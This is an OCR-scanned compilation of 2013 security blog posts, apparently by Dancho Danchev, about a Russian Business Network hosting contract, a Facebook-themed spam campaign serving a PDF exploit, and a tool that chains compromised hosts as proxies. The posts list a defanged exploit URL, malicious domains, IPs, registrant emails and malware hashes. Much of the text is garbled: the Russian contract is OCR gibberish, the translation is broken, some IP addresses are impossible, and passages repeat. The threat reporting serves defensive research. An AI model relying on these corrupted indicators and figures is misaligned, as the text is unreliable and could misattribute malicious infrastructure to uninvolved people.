the risk of having their activities exposed. Various cases throughout the last couple of years 
include: 


¢ [5]Cybercriminals use Twitter, LinkedIn, Baidu, MSDN as command and control infrastruc- 
ture 


¢ [6]RSA: Banking trojan uses social network as command and control server 
¢ [7]Trojan.Whitewell: What’s your (bot) Facebook Status Today? 

¢ [8]Twitter-based Botnet Command Channel 

¢ [9]Google Groups Trojan 


¢ [10]Zeus crimeware using Amazon’s EC2 as command and control server 
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The "best" is yet to come. 


This post has been reproduced from [11]Dancho Danchev’s blog. Follow him 
[12]Jon Twitter. 


ttps://www. google. com/#bav=&q=site:ddanchev. blogspot .com+RB 


. http: //www.shadowserver .org/wiki/uploads/Information/RBN- AS40989 . pdf 
. http: //www.shadowserver .org/wiki/uploads/Information/RBN_Rizing. pdf 
. http://ddanchev. blogspot . com/2008/01/rbns- fake-account-suspended-notices.htm 


ttp://www.zdnet .com/blog/security/cybercriminals-use-twitter-linkedin-baidu-msdn-as-command-and-control- 


infrastructure/11210 


ttp://www.zdnet .com/blog/security/rsa-banking-trojan-uses- social-network-as-command-and-control-server/6 


. http://www. symantec .com/connect/blogs/trojanwhitewell-what-s-your-bot-facebook-status-toda 
8. 
9. 
10. http://www.zdnet .com/blog/security/zeus-crimeware-using-amazons-ec2-as-command-and-control-server/5110 
11. 
12. 


9.8.3 Dissecting a Sample Russian Business Network (RBN) Contract/Agreement 
Through the Prism of RBN’s AbdAllah Franchise (2013-08-10 21:10) 
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Abdulla Hosting 
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Bodine 


Mowocre) Hoaas yorra!!! VPS copsepe: ue Care texmoncree MIN, Pyrewee COOTHONEMe Wen HH aWECTER Be scmomertem ued mabopmaunel of au alrece Pp a Nonex | 


beet OTP yaperen ton. 


TEE CmHe MOMPOCDE 


Howoctw cootttemay  Mnemetomer or 

Bce nOBOC TH HaWwErO CePpenca, CNe@UMare nee NPEAno were HT. Ste Conretos 23, 2007, 08:20:26 pm 
Xoctvar 0 Coctmersch | Botnemed emer or 

Bompoces, CRRDAMMRIO C BHP TYANOHEM XOC THerOe © Tom 


AOTOROP-O9EPTA (panenaue 
Aarycre 26, 2007, 04; 19:57 pen 
Dedicoted/VPS cepeepe a? Bot neg emer or 


__ 5 Cootmenmh 08 . 
Borpoce, comss-eee c o6cny=eseeem, HaCTpoeod 1 paSoroh suaenenn H OELeNereem ONPTYareHt Cepeepce 7 Te Magra 22, D008, 32:03:48 pm 
Dlovsores 0 Cootuennet 
ROMPOCe, COMDIMERIO C LOMEreRieT HIMeHLBO 0 Ten 
Npesnomorean 0 Coobmennent 
Baw Mpeanoxenne, nomena 1 saMeuReeTR NO paSoTe HaWEOrO Cepence OCTaENmTe & 3TOH Tene 0 Tew 
Pomoo 0 Cotman 
BOMpOces, KOTODEE HEME IR OTHECTH K OLMUICYKaReeeee TEM 0 Te 
Abdulla Hosting - Verbopraeoreind uentTp ad 
ClatwctHka @opyna 
270 CooGujermt & 98 Tex 07 32 Mom Nocmegpest atene: Vampirenek 
@D Nocreanee coccurersw: “sonpoces” ——- 
Nor sonata. Online 
2 Toctef, 0 Nanssooatenes 
Maxcinym Ondine coroans: 2. Macceryn Onkne: 10 (Aarycta 13, 2007, 11:01:05 pm) 
BOT IH (Rebenre mapore?) 
op, Vor nonmps000TeRN: Nopone: Nponon=rervrocte ceccH (o mrytax): Samoriente: 
—— — fo @ Bott | 


a= Powered by SF 1.1.9 | SIF © 2006. Simple Mechines 


[1]The Russian Business Network (RBN), is perhaps the most speculated, buzzed about, 
cybercrime enterprise in the World, a poster child for fraudulent activity ‘streaming’ from 


‘Mother Russia’, in the eyes of respected/novice security/cybercrime researchers across the 
globe. 


However, what a huge percentage of the researchers who’re just catching up with its 
‘[2]fraudulent performance metrics’ over the years, don’t realize, is how a newly emerged 


bulletproof hosting provider, managed to end up, as the World’s most prolific source of 
fraudulent/malicious activity. 


Hint: Basic business concepts like franchising, signalling the early stages of the modern- 
ization/professionalization of cybercrime, where being the benchmark has had a direct 
inspirational impact in the ‘hearts and minds’ of current and potential cybercriminals, then 
and now. 
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Case in point is [3]Abdallah Internet Hizmetleri also known as AbdAllah (VN), an ex-RBN 
darling relying on the franchise business concept. 


In this post, I’ll discuss a sample contract/contractual agreement that every one of its 
customers had to sign before doing business with them, which in the broader context leads to 
a situation, where while the franchise is publicly advertising the bulletproof hosting services 
for trojans, exploits, warez, adult content, drop projects, botnets and spam, it’s explicitly 
forbidding such activities - with some visible exceptions - in its contractual agreement. 


What does this mean? It means that the Russian Business Network, the benchmark for 
the majority of ex/currently active bulletproof hosting providers, has been (legally) forwarding 
the responsibility for the fraudulent activity to its customers, in between reserving the right to 
act and deactivate their accounts if they ever violate the agreement/contract. The first thing 
that comes to my mind when it comes to the RBN 'reaction’ in a socially oriented manner, are 
the infamous [4]RBN Fake Account Suspended Notices, and that’s just for starters, indicating 
a deteriorated understanding of malicious/fraudulent activity, with high profit margins in mind. 


Let’s go through the contract/agreement that every customer used to sign, before doing 
cybercrime-friendly business with them, both in original Russian, and automatically translated 
in English. 


Sample AbdAllah (VN) Contractual Bulletproof Hosting Agreement/Contract in Russian: 
1. MPEAMET JOrOBOPA 


1.1. 3aka34uK nopyyaeT, a UCIIO/JIHUTE/Ib bepeT Ha ce6aA OOA3aTE/IbCTBa NO Pa3MeLIECHUIO 
u/usu perucTpayyn BupTya/IbHoro cepBepa Z3AKA3YUNKA B ceTU UHTepHerT. 


2. YCJIOBUA BbINOJIHEHUA AOFOBOPA 

2.1. [lo 3aKNtOYeHM!O HacToslero AZorosopa UCHIO/JIHUTEJIb npou3BO4UT NepBoHaYaJIbHy!o0 
YCT@HOBKY UY HaCTPOUky BUPTYa/JIbHOrO CepBepa u obecneyBaeT 3AKA3ZYUUKA HeEobxogumonu 
YHQoOpMauNen JIA AQMUHUCTPUPOBaHUA BUPTYA/IbHOrO CepBepa. 

2.2. MCHOSJIHUTE/Ib o6ecneywBaeT goctTyn B ceTU WHTepHeT K BUPTYa/IbHOMy CepBepy, 


a@ Tak *e paOOTOCNOCOOHOCTb BCex AOCTYNHbIX CcepBYcoB Z3AKA3YNKA Kpyr‘OcyTOYUHO B 
TeYeHNe CEMY AHeN B HEJei0. 
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3. LIEHbI VW MlOPAAOK OFVIATbI 


3.1. CTOMUMOCTb YU NopsgoK onsaTbl paboT No HacTOAWwemMy JOoroBopy Ha MOMeHT 
ero 3aK/IOYCHUA §=oonpegenseTcaA B COOTBETCTBYUN C MeNCTBYIOLUYMMY YC/IOBNYAMY, 
PpacnpocTpaHsembimy coTpygHukamn no E-Mail u/uau ICQ. 


3.2. Onyata BHocutca 3AKA34YUKOM B CYeT OnmlaTbl ycAyru NOgZAZepKKU BUPTYa/IbHOrO 
Be6-cepBepa VUCIMOJIHUTEJIEM. UCIMIOJIHUTEJIb BnpaBe MPYOCTaHOBYTb NpeAocTaBsIeHue 
yC/IYr MPU OTPUL|aTeEJIbBHOM COCTOAHUN CyYeTAa. 


3:3: Bce BbIZe/IeHHbIe CepBepbl NpegoctaBlsroTtca B coctosHunu UNMANAGED, T.e 
agmunuctpatops! UCMOJIHUTE/IA moryt, HO He OBSA3AHbI HacTpauBaTb apeHgyempin 
cepBep. 3a mnW6yto HacTpouiky cepBepa 3AKA3YUNKA, nu60 CKpunTOB Ha HEM - B3bIMaeTCA 
nmlata B pa3mMepe 50 USD/3a 1 Yac paboTb! agmMuHuctpatopa UCHO/JIHUTE/IA no Bawemy 
Bonpocy, MYUHYMyM no Yaca. TIONMHOe AaAMUHNCTpupoBaHuve cepBepa cneynvanuctamu 
UCHOJIHUTESIA cront 250 USD B mMecay. BecnaTHO OCYLUeECTB/IAETCA Nepe3zarpy3Ka CepBep 
(ECM HET ABTOMATUYECKON G(OpMbI 4/18 3TOFO). 


3.4. B cnyyae He onnaTbl ycnyr 3AKA34UNKOM B nocnegHun geHb 6usNUHrOBOrO Nepyvosa, 
AanHuble 3AKA3YUNKA ygaaloTca NO HaCTYMICHUtO HOBbIX CYTOK 0€3 BO3BpaTHO. B cylyyae 
BUPTYa/IbHOrO XOCTUHTa YAa/ACTCA AKKAYHT VU BCe O39KaNbI AAHHOLO AaKKayHTAa, B C/yY4ae 
apeHAbl cepBepa (dedicated usu vps) cepBep CHYUMaeTCA C OO6C/YKUBAHNA, MOopMaTUupyloTCcAa 
MeCTKNe AUCKY. 


4. OTBETCTBEHHOCTb CTOPOH 


4.1. WCHO/JIHUTEJIb He HeCceT OTBeETCTBeHHOCTU nepeg 3AKA3YUNKOM usu TpeTeumu 
CTOPOHaMH 3a 1100bIe 3aA4ePXKKU, NpepbiBaHua, YLUEpO uN NOTepU, NPOUCcXOAALWNe U3-3a: 
(a) geqgeKToB B JSKHOOM 3/IEKTPOHHOM VWsJIN MexaHnyecKOoM o6opygoBaHuu, He 
npunagyeKxawem UCHO/IHUTEJSIHO; 

(6) npo6mem npu nepegaye aHHbIx VWIN COeguHeHuN, Npovuz0WeAWwux He NO BUHe 
UCHOJIHUTEJIA ; 

(8B) BCNeACTBUe OOCTOATE/NbCTB HENPeCOAOUMON CYJIbl B OOLIENPYUHATOM CMBIC/e, T.é. 
YPe3BbIYaMHbIMU CUaAMU YU HeNpeZOTBPaTUMbIMU OOCTOATE/IbCTBaMN, He NOAIeKalumMu 
Ppa3yYMHOMY KOHTPO/JINK0; 

(r) ZaBsenue BacTer. 


4.2. [pu pactopxeHuu JoroBopa no “vnuynaTuBe 3AKA34YUKA, HevNcnos1b30BaHHaA YaCTb 
aBaHca 3AKA3YUNKY He Bo3BpallaeTca. 


4.3. WMCNOJIHUTEJIb octaspnaetT 3a cob0ov% mpaBo mpnocTaHoBHuTb Obc/y*KNBaHNe 
3AKA34NKA nan pactoprHyTb gorosop B 6e3yCJIOBHOM NopsgakKe 6e3 BO3BpaleHna 
CPeCACTB 3aKa34NKy B CIC AYIOLUNX CAY4AAX: 


- pasMeLtueHne DeTCKON NopHorpadun uv 300q@usuu B 11060OM BY ge; 


- NOMbITKH B3/1I0OMa, HCECAHKWUMAOHNYPOBAHHOLO MPOHWYKHOBeCHHA Ha CeCpBep, B aKKayHTbI 
APYIUWX KJIMVCHTOB, NOMbITKK NOPpun o6opyfoBaHna vAJIKZ NporpaMMHOoro o6ecneyeHns; 


- NOMbITKH B310Ma MNMpaBuTeJIbCTBeCHHbIX opraHn3zaunn B JIIOGOM Buse; 
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- nonbiTkw cnama sroboro podfa C Hallinx C@C@PBeCPpOB BUPTYaJIbBHOTO XOCTHHTa, KPpomMe 
Kak YWepe3 COKCBI,; 


- NonbITKH quwinura OaHkosB (Kpaxka MeHer); 


- pasMeleHne nHdmopmaunn no TOoprospsie OpyxXnvemM KH HapKOTHKaMY, TOpProBJin 
JIOMbMU WJIK OPpraHamMu niogeuv, Bbi3bIiBaloLlune MCXKHAUNOHAJIBHYHO KW PpeJINTHO3sSHYIO 
PO3Hb, NPK3bIBAaAIOLLLY!IO K BOMHe HW Hacwsinio; 


- HeonpaBgAaHHaad neperpy3kKa BbIYMCJINTeEJIBHbIX MOLUHOCTeK CepBepa BUPTya/IbHOro 
xocTHHra (gonyckaeTcA KMCNONb30BaTb He Gbosee 5 % MOLIHOCTH Npoueccopa uv He 
6onee 128M6 onepaTHBHOK NamaTH cepBepa); 


- NONbITKH B3sI0OMa C CepBepoB (dedicated wu BUpTyasIbHbIM XOCTHHrT) - CepBepbl, 
KOTOpbie pacnosIOxKeHbI PALOM B CTOWKe, H60 KJINCHTOB 3TOM We CTpaHbi, rye 
pacnosIoxKeH cepBep; 


- ockopOs1eHne B 11060K Gopme COTpyAHMKOB CepBica. 


4.4. MUCHIOJIHUTE/Ib He oTBeYaeT 3a COgepxKaHue UHqdopmayun, pa3zmMeuwaemon 
BAKA3YUNKOM. 


4.5. MCHOJIHUTE/Ib He 6ygeT HECTU OTBETCTBEHHOCTU 3a 0ObIe 3aTpaTbI uN ywepo, 
MPAMO UJIN KOCBEHHO BO3HUKLUVE B PC3Y/IbTATe UCNO/Ib30BaHNA YC/IYTU BIO XOCTUHTa. 


4.6. MoneyBack 3a BbIJZ@/IGEHHbIN CepBep BO3MOXKeCH TO/JIbKO B TOM cyIyYae, eC/IN 
H@JOCTYNHOCTb AaHHoro cepBepa npouncxoguT no BYuHe UCTIOJIHUTEJIA, BBugy Toro, 4TO 
UCHO/JIHUTESIb onnayuBaeM NO/HY!O CTOUMOCTb CepBepa B Aata-LleHTp. Takxke BO3MOxKHAa 
3aMeHa CepBepa. 


4.7. Pa3zmMeujeHne canToB 3AKA34NKA, peknamupyembpix SPAMom Ha cepBepax 
NCNOJIHUTEJIA (kak BUpTay/bHOrO XOCTHHTa, Tak HW dedicated) onnaunBaetTca 
OTJZeJIbHO H3 pacyeta O6bema nucem. [pu o6bémMax OT 5MH ZO 10M1H =1000 USD 
- 1500 USD B mecay 3a cepBep B KuTae uan TourKonure, mn6o0 150 USD Hegena nan 
500 USD B Mecay 3a BUPTyas/IbHbIK XOCTHHT, Gonee 10-20 maH. = 200 USD Hegena 
nnu6o 2000 $ 3a BbIZe/ICHHbIN CepBep. 


4.8. UCHIOJIHUTE/Ib oOs3yeTCA JelaTb @KEAHEBHbIE PeZePBHbIE KONMUN akKKayHTa 
BAKA34UNKA Ha CTOPOHHUN CepBep (TO/IbKO BUPTYaJIbHbIN XOCTUHT). 


4.9. NCNOJIHUTEJb o6a3yeTca pewiaTb CaMOCTOATENbHO BCe KasNobp! (aby3bi/abuse), 
He mpvBsekan K 3ITOMyY 3AKA3YUNKA vn 6e3 BMeWaTeJIbCTBa B DHaHHbie 3AKA34NKA. 
MCNOJIHUTEJIb He pewaetT xasnobb! (aby3bi/abuse) oT nonnyunn, KPyNHbix 
NpaBuTes/IbCTBeHHbIX OpraHn3zauNn Hn VerSign. 


4.10. WCHOJIHATE/Ib He gaeT HuKakuXx rapaHTUu, 4TO GoMeH 3AKA3YUNKA He OygeT 


3a6/IOKUPOBaH NO HObIM MPNYNHaM, a OCOOCHHO Takum Kak s11000U BY SPAMa, fraud, 
phishing uv T.n. 


4443 


5. KOH@NAEHUNASIBHAA UH®OPMALUA 


5.1. CTopouHbi o6a3yroTca 6e3 OO0WAHOrO corfmacuaA He NepegsaBaTb TPeTbUM JINLIamM 
JIMOO UCNO/bZ0BaATb VUHbIM CnOocobOM, He NMPeZYCMOTPeHHbIM ycroBYsMU oroBopa, 
OpraHU3ZalWNOHHO-TeEXHOJIOFMYeCKYHO, KOMMePYeCcKy0O, QUHAHCOBy!0 VU UHyYHO YUHdopmaluio, 
COCT@B/IAIOLUYIO CEKPeT 4/18 JIWOOON U3 CTOPOH (gaslee - "KOH@UAeHUNabHas NUHQopmMaynua") 
lMpu yCAOBUN, TO: 


- TakaaA “uHq@opmauna UMeeT AeGUCTBYTeNbHYy!IO YUJIUN MOTECHLUNAJIBHYO KOMMePYeCcKY!0 LICEHHOCTb 
B CUSIY CC HEUZBECTHOCTU TPETbUM JINLAaM;, 


- K TakKou “uHq@opmayuu HeT CBOOO4HOrO AOCTYNa Ha 3€2KOHHOM OCHOBaAHUN, 


- OONagaTesib TakoU “YHq@opmayuun MPUNHUMAaeT HaZvieKalluNe MEpbl K o6ecneyeHuto ee 
KOHQUACHUNASIbHOCTYU. 


5.2. CTOPOHbI OOa3yroTca, 6e3 OOOWAHOrO corfnacua, He NepesaBaTb TPeTbUM NLIamM 
cBegeHua o cogepxanun uv ycnosusax AJoroBopa. 


5.3. NYCNOJIHUTEJIb ob6s3yeTCA NpegoTBpalaTb 3anvcb sOroB Ha cepBepax 
BUPTYaJIbHOrO XOCTHHTa KH MapuupyTH3npyroulem obopyAoBaHnn. 


5.4. BygbTe BHYMaTesbHbI, COoTpyYAHuKU UCIO/JIHUTE/IA He 3anpauiuBaroT Naposmu OT 
@KKAYHTOB BUPTYasJIbHOrO XOCTUHTa WU BbIZe/ICHHbIX CepBepoB. WUCK/IIOYEHNEM AB/IACTCA 
cuTyauna, Korga 3AKA34UK npocuTb npov3BecTu Kakue-U60 paboTbi Ha ero BbIZe/1eHHOM 
CepBepe. 
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Abdulla Hosting - a simple, machines forum 
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Automatically translated Russian Business Network (RBN) Contractual Agreement/Contract: 
1. SUBJECT OF CONTRACT 


1.1. Customer Requests, but ARTIST is committed to the placement and / or registra- 
tion CUSTOMER virtual server on the Internet. 


2. CONDITIONS OF IMPLEMENTATION OF THE TREATY 
2.1. At the conclusion of this treaty ARTIST produces initial setup and configuration of 
the virtual server and provides the necessary information for CUSTOMER virtual server 


administration. 


2.2. ARTIST provides access to the Internet to the virtual server, as well as efficiency of 
all available services CUSTOMER day seven days a week. 


3. PRICES AND ORDER OF PAYMENT 
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3.1. Cost and arrangements of works under this contract at the time of its conclusion is 
determined in accordance with existing conditions, the staff distributed by E-Mail and / or ICQ. 


3.2. Payment is made ZAKAZCHIKOM as payment services support virtual web server IS- 
POLNITELEM. ARTIST right to suspend the provision of services at a negative status of the 
account. 


3.3. All dedicated servers are provided in a position UNMANAGED ie ISPOLNITELYA ad- 
ministrators can, but not OBYAZANY tune rented server. For any server setup CUSTOMER or 
scripts on it - charge of $ 50 USD / for 1 hour administrator ISPOLNITELYA to your question, at 
least half an hour. The full server administration specialists ISPOLNITELYA worth USD 250 per 
month. Free done rebooting the server (if not automatic form for this). 


3.4. If no payment ZAKAZCHIKOM bill on the last day of the period, the data are re- 
moved CUSTOMER new offensive on days without reciprocating. In the case of virtual hosting 
account and removed all of your backups, in case the rental server (dedicated or vps) server 
is removed from service, formatted hard drives. 


4, RESPONSIBILITY OF PARTIES 

4.1. ARTIST no responsibility to ZAKAZCHIKOM or third parties for any delays, interrup- 
tions, damage or losses that occur because Of: 

(a) defects in any electronic or mechanical equipment, not belonging ISPOLNITELYU; 

(b) problems in the transfer of data or connection that occurred through no fault ISPOLNITELYA; 

(c) due to force majeure circumstances, in the conventional sense, that is, nepredotvratimymi 
forces and emergency circumstances, not subject to reasonable control; 

(g) pressure from the authorities. 


4.2. At the dissolution of the Treaty on the initiative CUSTOMER, ZAKAZCHIKU unused 
portion of the advance is not refundable. 


4.3. ARTIST reserves the right to suspend or terminate CUSTOMER service contract 
in order without the unconditional return of customer funds in the following cases: 


- Locating and zoofilii child pornography in any form; 


- attempted burglary, unauthorized entry to the server, in the accounts of other 
customers, trying to damage equipment or software; 


- attempted burglary governmental organizations in any form; 
- spam attempts of any kind from our servers hosting virtual except through SOCKS; 
- phishing attempts banks (stealing money); 


- posting on the arms trade and drug trafficking, or human organs, causing 
inter-ethnic and religious discord, calling for war and violence; 


- unjustified computing power overload virtual server hosting (which is allowed to 
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use no more than 5 % of CPU capacity, and no more than 128 MB of RAM server); 


- attempted burglary of servers (and dedicated virtual hosting) - servers, which are 
located next to the rack, a customer in the same country where the server; 


- insulting to any form of service personnel. 


4.4. ARTIST is not responsible for the content of the information posted ZAKAZCHIKOM. 


4.5. ARTIST shall not be liable for any costs or damages arising directly or indirectly 
from the use of Web hosting services. 


4.6. MoneyBack for dedicated server is possible only in case the inaccessibility of the 
fault occurs on the server ISPOLNITELYA, because ARTIST pay for the full cost of a server in 
Data Center. Also possible replacement server. 


4.7. Placing sites CUSTOMER advertised on servers ISPOLNITELYA SPAM (as 
virtaulnogo hosting, and dedicated) is charged separately at the rate of the volume 
of letters. With volume of 5 million to 10 million USD = 1000 - 1500 USD per month 
for the server in China or Gong Konge or 150 USD week, or 500 USD per month for a 
virtual hosting, a 10-20 million = 200 USD week, or $ 2000 for a dedicated server. 


4.8. ARTIST undertakes to do daily backups CUSTOMER account for the third-party server 
(only virtual hosting). 


4.9. ARTIST undertakes to decide all complaints (abuzy / abuse), are not en- 
gaging in the CUSTOMER and without interference in the CUSTOMER data. ARTIST 
does not solve complaints (abuzy / abuse) from the police, government organiza- 
tions and major VerSign. 


4.10. ARTIST gives no guarantees that the domain CUSTOMER not be blocked for any 
reason, but especially like any kind of SPAM, fraud, phishing, etc. 


5. CONFIDENTIAL INFORMATION 

5.1. The Parties undertake without the unanimous consent not to transfer to third par- 
ties or used in any other way other than prescribed conditions Treaty, organizational and 
technological, commercial, financial and other information, which is the secret to any of the 
parties (hereinafter - "confidential information"), provided that: 

- this information is actual or potential commercial value by virtue of its unknown third parties; 
- to such information no free access to the lawful; 


- holds such information shall take appropriate steps to ensure its confidentiality. 


5.2. The Parties undertake, without unanimous consent, not to transfer to third parties 
about the content and conditions of the Treaty. 
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5.3. ARTIST undertakes to prevent logging on servers and virtual hosting routing 
equipment. 


5.4. Be careful, do not require employees ISPOLNITELYA passwords from virtual hosting 
accounts and dedicated servers. The exception is when CUSTOMER request to any work for 
his Vydelennom Server. 


Excluding the direct offering of managed servers for spam sending in the actual agree- 
ment/contract, and the fact that their abuse department is virtually non-existent, the contact 
explicitly prohibits related malicious/fraudulent activity. Naturally, that’s not the case when 
AbdAllah (VN) used to advertise its bulletproof hosting service across cybercrime-friendly 
communities, "back in the day": 


¥ ' eer € ery < 
“ae We do mot sell kar theerynal servers! t P network m Hong & arabe 


In 2013, despite the overall availability of RBN-like bulletproof hosting providers, cyber- 
criminals continue experimenting with abusing legitimate infrastructure in an attempt to 
mitigate the risk of having their activities exposed. Various cases throughout the last couple 
of years include: 


¢ [5]Cybercriminals use Twitter, LinkedIn, Baidu, MSDN as command and control infrastruc- 
ture 


¢ [6]RSA: Banking trojan uses social network as command and control server 
¢ [7]Trojan.Whitewell: What’s your (bot) Facebook Status Today? 

¢ [8]Twitter-based Botnet Command Channel 

* [9]Google Groups Trojan 


¢ [10]Zeus crimeware using Amazon’s EC2 as command and control server 


The "best" is yet to come. 
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This post has been reproduced from [11]Dancho Danchev’s blog. Follow him 
[12]Jon Twitter. 


ttps://www. google. com/#bav=&q=site:ddanchev. blogspot .com+RB 


. http: //www.shadowserver .org/wiki/uploads/Information/RBN- AS40989 . pdf 
. http: //www.shadowserver .org/wiki/uploads/Information/RBN_Rizing. pdf 
. http://ddanchev. blogspot . com/2008/01/rbns-fake-account-suspended-notices.htm 


ttp://www.zdnet .com/blog/security/cybercriminals-use-twitter-linkedin-baidu-msdn-as-command-and-control- 


infrastructure/11210 


. http://www. zdnet .com/blog/security/rsa-banking-trojan-uses-social-network-as-command-and-control-server/6 


. http://www. symantec .com/connect/blogs/trojanwhitewell-what-s-your-bot-facebook-status-toda 
8. 
9. 
10. http://www.zdnet .com/blog/security/zeus-crimeware-using-amazons-ec2-as-command-and-control-server/5110 
11, 
12. 


9.8.4 Spamvertised ’Confirmed Facebook Friend Request’ Themed Emails Serve 
Client-Side Exploits (2013-08-15 14:03) 


Ag a has confirmed that you're friends on Facebook. 
You may know some of #rriends 
i Friend - a 
wr 


Co] SS oI 
| — ‘ec 


| 


unsubscribe 


A currently circulating malicious spam campaign, entices users into thinking that they’ve 
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received a legitimate ’Friend Confirmation Request’ on Facebook. In reality thought, the 
Campaign attempts to exploit client-side vulnerabilities, [1]CVE-2010-0188 in particular. 


Client-side exploits serving URL: 


hxxp://facebook.com.n.find-friends.lindoliveryct.net:80/news/facebo Ok- 
onetime.php?dpheelxa=11:30:1l:1g:1j &pkvby=h &rzuhhh=1h:33:10:2v:32:10:2v:1o:1j:1m 
&ycxicvr=1f:1d:1f:1d:1f:1d:1f 


Detection rate for the malicious PDF: [2]MD5: 39326c9a2572078c379eb6494dc326ab 
- detected by 3 out of 45 antivirus scanners as PDF/Blacole-FAA!39326C9A2572; 
Exploit:Win32/CVE-2010-0188; Exploit.Script.Pdfka.btvxj 


Domain name reconnaissance: 


facebook.com.n.find-friends.lindoliveryct.net - 66.230.163.86; 95.111.32.249; 
188.134.26.172 - Email: zsupercats@yahoo.com 


Responding to the same IPs (66.230.163.86; 95.111.32.249; 188.134.26.172) are also 
the followig malicious domains: 


actiry.com - Email: stritton@actiry.com 

askfox.net - Emai: bovy@askfox.net 

bnamecorni.com 

briltox.com - Email: lyosha@briltox.com 
condalinneuwu37.net 

condrskajaumaksa66.net 

cyberflorists.su - Email: mipartid@gmx.com 
evishop.net - Email: hardwicke@evishop.net 
exnihujatreetrichmand77.net 
gondorskiedelaahuetebanj88.net 
gotoraininthecharefare8&8.net 

liliputttt9999.info - Email: dolgopoliy.alexei@yandex.ru 
lucams.net - Email: renault@lucams.net 
micnetwork100.com - Email: 369258wq@sina.com 
musicstudioseattle.net- Email: rexona1948@live.com 
nvufvwieg.com - Email: 369258wq@sina.com 
partyspecialty.su - Email: mipartid@gmx.com 
pinterest.com.onsayoga.net 
quill.com.account.settings.musicstudioseattle.net 
seoworkblog.net - Email: mendhamnewjersey@linuxmail.org 
seoworkblog.net 
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tigerdirect.com.secure.orderlogin.asp.palmer-ford.net 
tor-connect-secure.com - Email: 369258wq@sina.com 
vip-proxy-to-tor.com 


Name servers used in these campaigns: 


Name Server: NS1.TEMPLATESWELL.NET - 94.249.254.48 - Email: freejob62@rocketmail.com 
Name Server: NS1.THEGALAXYATWORK.COM - 94.249.254.48 - Email: samyideaa@yahoo.com 
Name Server: NS1.MOBILE-UNLOCKED.NET - 91.227.220.104 - Email: usalife- 
coach47@mail.com 

Name Server: NS2.MOBILE-UNLOCKED.NET - 32.100.2.98 

Name Server: NS1.KNEESLAPPERZ.NET 

Name Server: NS1.MEDUSASCREAM.NET - 37.247.108.250 - Email: m _mybad@yahoo.com 
Name Server: NS1.CREDIT-FIND.NET - 194.209.82.222 - Email: mendhamnewjer- 
sey@linuxmail.org 

Name Server: NS1.GONULPALACE.NET - 194.209.82.222 - Email: mitinsider@live.com 

Name Server: NS1.NAMASTELEARNING.NET - 993.178.205.234 - Email: 
minelapse2001 @outlook.com 

Name Server: NS2.NAMASTELEARNING.NET - 205.28.29.52 


The following malicious MD5s are also known to have phoned back to the same IPs/were 
downloaded from the same IPs in the past: 


MD5: e08c8ed751a3fc36bc966e47b76e2863 
MD5: f507b822651d2fbc82a98e4cc7f735a2 
MD5: e08c8ed751a3fc36bc966e47b76e2863 
MDS5: f88d6a7381cObbac1b1558533cfdfd62 
MD5: 11be39e64c9926ea39e6b2650624dab4 
MD5: ea893fb04cc536ff692cc3177db/eb66f 
MD5: c8f8b4cOfced61f8a4d3b2854279b4ef 
MD5: 93bae01631d10530a7bac7367458abea 
MD5: 199b8cfOffd607787907b68c9ebecc8b 
MDS5: 6blbef6fb45f5c2d8b46a6eb6a2d5834 
MD5: 9eb6ed284284452f7a1e4e3877dded2d 
MDS5: efacflc2c6b33f658c3df6a3ed170e2d 
MD5: 7c70d5051826c9c93270b8c7fc9d276f 
MD5: dcb378d6033eed2e01 ff9ab8936050a0 
MD5: 8556f98907fd74be9a9c1b3bf602f869 


Updates will be posted as soon as new developments take place. 


1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE- 2010-0188 


2. https://www.virustotal .com/en/file/667£c839167456a70f 22cf5c6ef 8f 029 1d4e1399374219469f 56472251ec58af/analys 


is/1376565463/ 


9.8.5 The Cost of Anonymizing a Cybercriminal’s Internet Activities - Part Three 
(2013-08-21 20:57) 


Over the years, I’ve been persistently highlighting the abuse of compromised hosts as either 
"stepping stones’, or as the primary facilitators for ‘island hopping’ campaigns, empowering 
those using them with the necessary non-attributable ‘know-how’ to not just anonymize their 
Internet activities, but also, engineer cyber warfare tensions. 


The utilization of hacked/compromised hosts/PCs as ‘island hopping’ points, or as ‘step- 
ping stones’, continues to take place in 2013, with more managed cybercrime-friendly 
services offering access to compromised hosts located virtually all over the World, access to 
which can be bought in a cost-effective manner, thanks to the available discounts or price 
discrimination schemes. 


Catch up with previous research on the topic: 


¢ [1]The Cost of Anonymizing a Cybercriminal’s Internet Activities 

¢ [2]The Cost of Anonymizing a Cybercriminal’s Internet Activities - Part Two 
¢ [3]Cybercriminals SQL Inject Cybercrime-friendly Proxies Service 

¢ [4]Malware Infected Hosts as Stepping Stones 


¢ [5]Hacked PCs as ‘anonymization stepping-stones’ service operates in the open since 
2004 


¢ [6]‘Malware-infected hosts as stepping stones’ service offers access to hundreds of com- 
promised U.S based hosts 


¢ [7]New service converts malware-infected hosts into anonymization proxies 


What has changed over the years? Is the once thought the be the future of anonymization 
for cybercrime-friendly activities, ‘proxy chaining’ - think chaining of connections between 
multiple malware-infected hosts - still relevant today? Or was the concept largely replaced by 
log and data retention free cybercrime-friendly VPN providers, that continue popping up on 
everyone’s radar? 


Since 2010, a HTTPS-supporting, DIY multiple gates application (proxy which can be a 
Socks 4/Socks 5 compromised host given it has been properly configured for the purpose) 
managing, Man-in-the-Middle "attack" performing - in order to randomize for anonymization 
purposes - cookie/headers modifying of the requests performed through the "chaining" of 
compromised hosts/servers, has been commercially available for cybercriminals to take 
advantage of. 


Let’s take a close look at this state of the art gate/proxy chaining cybercrime-friendly 
application. 
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Sample screenshots of the application’s interface: 


@ @httos://www.server 1.com/gate.php 
@http: /wew.server2.com 
@hittp://Aww 3.0 
@hittps:/ 


| | Network information 


[2:24:51] www. yandex.ru:80 
GET /data/mail.js?yaru*y HTTP/1.0 


[2:24:51] kiks. yandex.ru:80 
GET /su/ HTTP/1.0 


[2:24:51] kiks. yandex.ru:80 
GET /system/fc06.htmi HTTP/1.0 


[2:24:51] suggest. yandex.ru:80 
GET /jquery-1-4-2.crossframeajex.html HTTP/1.0 


Query Strings v 


Gate URL: g® https: //rww.server 1.com/gate.php 


Example: http: //www.site.com/gate.pnp 


Key: (@) fx2996S 


Example: H4fn03Up 


Example: proxy=1; variable =value 


[V) Set this gate active 
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&} © Direct mode (no chaining) 


Requests will be distributed evenly between active gates 


==) © Chain mode (Exact order of gates) 
The order of gates will be the same as specified in the list 


3S © Chain mode (Random order of gates) 


Number of gates in a chain: [2 | 


Each request will be sent through a random sequence of gates. 


© © Chain mode (Random order of intermediate gates; specified exit gate) 


@& | http:/ /www.site.com/gate.php (Pwd: 123, Key: R9pUCXTFo4v9y) sy 
